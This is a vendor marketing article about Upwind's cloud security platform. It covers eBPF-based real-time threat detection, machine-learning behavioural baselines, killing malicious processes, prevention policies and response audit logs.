Upwind’s next-generation cloud security platform not only provides real-time risk analysis and threat detection, it also gives you the ability to respond to threats in real time.
In this article, we will dive deep into how Upwind detects threats in real time, our advanced methods of activity-based threat detection, and ways you can stop or prevent threats directly within the Upwind platform.
Upwind’s Advanced Threat Detection
Upwind’s real-time threat detection capabilities are powered by our high-performance Upwind eBPF sensor, which monitors all traffic in real time at the process, packet, and system call levels. By doing so, Upwind is able to identify threats in real time by monitoring the following:
- Processes: Monitor processes for suspicious activities, such as the execution of known malicious processes or processes with suspicious arguments.
- Network: Monitor network traffic on Layers 3, 4 and 7 for suspicious activities, such as unusual or unauthorized network traffic.
- Cloud logs: Monitor Kubernetes audit logs to detect threats in your cloud and Kubernetes environment.
- Files: Monitor files to detect suspicious or malicious file-related activities, such as file creation, modification, and deletion.
By leveraging real-time insights and machine learning, Upwind rapidly detects advanced threats, learns from behavior and alerts you to anomalies as soon as they appear in your environment.
Upwind Cloud Baselines
Upwind’s threat detection capabilities go beyond traditional threat detection methods with Upwind Cloud Baselines, which are created by continuously monitoring your application’s activity over hours, days and weeks to build sophisticated machine-learning (ML) models that enable Upwind to distinguish “normal” from “abnormal” activity. This in-depth analysis broadens your understanding of typical resource activity, and quickly identifies anomalies when they occur.
Upwind generates cloud baselines by first taking a comprehensive, DevOps-grade inventory of your cloud infrastructure and then continuously monitoring process executions, network communications, and file system accesses across Kubernetes workloads, serverless functions, and virtual machines using the Upwind eBPF sensor. The Upwind sensor also provides real-time insights into Layers 3, 4 and 7 of your network, giving you insights into normal activity for workloads, resources and APIs.
By generating cloud baselines, Upwind surpasses typical threat detection methods, such as only scanning for known malware signatures. Instead, we proactively identify abnormal human and machine activities within your cloud environment, which gives you a defense-in-depth for detecting and responding to potential threats.
“Upwind’s ability to recognize abnormal behavior and correlate it with threats has opened new avenues for how we respond to potential breaches. The behavioral baselines feature has been instrumental in showing us exactly how our users and resources typically behave and immediately alerting us to deviations.”
Siim Kobin, Head of IT Operations, Tickmill
Stop Advanced Threats with Upwind
Whenever a new threat detection is identified in the Upwind platform, you are given the relevant information including severity, root cause and whether or not it is an active threat. For active threats of every severity, you have the option to respond to the threat.
Kill Malicious Processes
Easily terminate the malicious process and quickly stop it from causing damage within your environment. Using Upwind’s threat detection capabilities, you are also able to view the detection process tree and relevant context to give you absolute certainty about the need to remediate it and any child processes that stem from the original process tree.
This is significant because it gives you the ability to not only kill a single malicious process, but to also kill processes running on multiple different containers at the same time. This granular level of control helps you the malicious process itself and not the container, so you can rapidly secure your workloads without disrupting your cloud operations.
Create Prevention Policies
Upwind also provides you with the ability to set prevention policies for multiple processes, with or without arguments, over a specific timeframe. These flexible policies will repeatedly kill a malicious process if it tries to re-spawn, even if it is not currently running. This extends beyond the response capabilities, providing security teams with tools to not only stop threats but also prevent them in the future, while developers and DevOps teams address the root cause to prevent any further malicious activity.
Audit Trail
Using Upwind’s threat response and prevention capabilities, you can also track all current prevention settings, making it easy for teams to view all policies in one place. Upwind also keeps a response audit log, giving you the ability to identify who within your organization chose to use the response feature, when it was used and if it was successful.
Learn More
Use Upwind’s activity-based Cloud Baselines, advanced threat detection and response capabilities, and threat prevention strategies to ensure proactive protection from threats. To learn more about Upwind’s threat detection & response capabilities, visit the Upwind Documentation Center (login required) or schedule a demo.
